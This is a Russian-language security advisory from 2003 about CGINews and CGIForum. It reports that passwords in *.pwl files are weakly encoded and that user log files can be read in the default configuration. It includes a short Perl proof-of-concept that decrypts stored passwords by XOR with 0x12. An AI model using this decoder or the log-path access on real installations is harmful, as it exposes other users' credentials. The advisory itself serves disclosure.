Security Lab

Несколько уязвимостей в CGINews и CGIForum

Дата публикации:17.12.2003
Всего просмотров:1124
Опасность:
Низкая
Наличие исправления: Частично
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Локальная
Воздействие: Раскрытие важных данных
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: CGINews 1.x
CGIForum 1.x
Уязвимые версии: CGINews 1.07 и CGIForum 1.09

Описание: Уязвимость обнаружена в CGINews и CGIForum. Локальный пользователь может расшифровать пароли. Удаленный пользователь может просматривать журналы регистрации.

Пароли пользователей в *.pwl файлах закодированы слабым алгоритмом шифрования, который легко может быть взломан локальным пользователем.

Удаленный пользователь может читать лог файлы на сервере в конфигурации по умолчанию, используя следующий формат:

username/username.log

Пример/Эксплоит:

print "CGI News 1.07 - Pass Decrypt Utility \n";
print "------------------------------------ \n";
print "By JeiAr [ http://www.gulftech.org ] \n";

print "\n" x 3;

print "Please Enter Encrypted Pass:";

$UserPassword = <STDIN>;
chomp $UserPassword;

$UserPassword = EncDec($UserPassword);

print "\n" x 5;

print "Encrypted Pass Is: $UserPassword";

sub EncDec
{
	my @args = split //, shift();
	my $retval = '';
	for (my $stringpos = 0; $stringpos <= $#args; $stringpos++) {
		$retval .= chr(ord($args[$stringpos]) ^ 0x12);
	}
	return $retval;
}

exit;

URL производителя: http://triskam.virtualave.net/cginews.html

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: Issues In CGINews and CGIForum